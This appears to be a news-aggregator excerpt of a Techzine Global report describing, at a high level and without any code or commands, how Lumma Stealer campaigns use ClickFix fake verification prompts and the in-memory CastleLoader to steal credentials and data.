"CastleLoader plays an important role in the current campaign. This loader runs exclusively in memory and therefore leaves little trace on the hard drive. This makes it more difficult for traditional security solutions to recognize the threat. The code is also heavily obfuscated, and communication with the controlling infrastructure is flexible. Once CastleLoader is active, Lumma Stealer is brought in as a second phase."
"The distribution method is remarkably simple. Victims receive instructions via a fake verification or error message to copy text and paste it into the Windows execution window. What looks like an innocent verification process turns out to be the launch of malicious code. Researchers point out that this tactic works mainly because users have become accustomed to technical workarounds and verification steps, lowering the threshold for following instructions."
"This loader runs exclusively in memory and therefore leaves little trace on the hard drive. The code is also heavily obfuscated, and communication with the controlling infrastructure is flexible. It is striking that the infrastructure behind the malware has been quickly rebuilt after previous disruptions by investigative services. By using rotating domains and sometimes legitimate online services to host files, the operators can make detection more difficult and reduce suspicion."
Lumma Stealer campaigns are spreading widely through a ClickFix social-engineering technique that tricks victims into copying and pasting commands into the Windows execution window. CastleLoader, a heavily obfuscated in-memory loader with flexible C2 communication, stages the second-phase Lumma payload and leaves little forensic trace on disk. The social-engineering prompt exploits user familiarity with technical verification steps to lower suspicion. Once active, Lumma harvests stored passwords, browser data, documents, crypto wallets, authentication tokens, and system profiling information for resale or follow-on attacks. Operators rapidly rebuild infrastructure using rotating domains and legitimate hosting to evade takedowns and reduce detection.
Read at Techzine Global
Unable to calculate read time
Collection
[
|
...
]